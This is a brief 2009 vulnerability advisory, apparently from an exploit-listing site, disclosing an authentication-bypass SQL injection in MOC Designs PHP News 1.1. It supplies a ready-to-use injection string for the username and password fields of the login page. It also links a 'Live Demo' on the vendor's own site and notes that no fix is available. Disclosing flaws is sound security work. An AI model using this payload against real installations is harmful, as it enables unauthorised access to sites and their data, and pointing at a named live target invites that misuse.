MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability

2009-08-04 17:10:34

#########################################################################
[+] MOC Designs PHP News v1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#########################################################################

[+] Homepage : http://www.mocdesigns.com/

[+] SQL Injection (Auth Bypass)

- PoC

http://127.0.0.1/news/login.php

User : 'or''='
Password : 'or''='

- Live Demo

http://www.mocdesigns.com/news/login.php

#########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.